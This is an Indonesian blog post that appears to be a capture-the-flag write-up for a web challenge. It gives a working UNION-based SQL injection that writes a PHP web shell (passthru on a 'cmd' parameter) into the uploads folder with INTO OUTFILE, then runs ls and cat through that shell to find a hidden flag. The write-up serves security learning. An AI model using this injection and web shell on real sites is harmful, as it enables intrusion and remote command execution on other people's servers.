coba anda open source pada web soal maka anda akan menemukan link yang dikomentar seperti
<!--<li><a href="/uploads/">Our files</a></li>-->wow itu kita bisa mengecek info phpnya jadi kita cari document rootnya "/var/www/html", pertama kita mencari jumlah kolum jadi "domain/level8.php?id=2 UNION SELECT 1,2-- ", ternyata terdapat dua fie disini bisa dimanfaatkan untuk menggunakan untuk mengupload shell.
<!--<li><a href="/phpinfo.php">Debug</a></li>-->
setelah mendapatkan jumlah kolum kita langsung saja pakai Query " UNION SELECT "<?php passthru($_GET[\"cmd\"]);?>","" INTO OUTFILE "/var/www/html/uploads/belajar_jadi_haker.php"-- ", berhasil di upload.
setelah itu anda buka nama file yang sudah kita upload tadi, contoh seperti "domain/uploads/belajar_jadi_haker.php" jika tidak ada pesan error maka file berhasil di upload.
selanjutnya kita melihat apa saja yang terdapat pada file root dengan perintah seperti ini " /uploads/belajar_jadi_haker.php?cmd=ls /var/www/html/" maka akan muncul list folder dan file, saya menemukan folder mencurigakan kemungkinan flagnya disana yaitu secret_level8_folder_you_wont_be_able_to_guess_without_actually_getting_a_shell.
kemudian kita bongkar folder tersebut dengan " domain/uploads/belajar_jadi_haker.php?cmd=ls /var/www/html/secret_level8_folder_you_wont_be_able_to_guess_without_actually_getting_a_shell" dan terdapat file flag.php.
langsung saya cat file flag tersebut dengan " /uploads/belajar_jadi_haker.php?cmd=cat /var/www/html/secret_level8_folder_you_wont_be_able_to_guess_without_actually_getting_a_shell/flag.php" ternyata tidak muncul apa2 :) lalu saya open source flag.php dan flag disembunyikan di komentar html :).
NB: passthru? itu merupakan function bawaan php yang bisa digunakan untuk menjalan perintah Cmd
Referensi:
http://0haxor.blogspot.com/2012/08/into-outfile-uploading-your-shell-with.html
No comments:
Post a Comment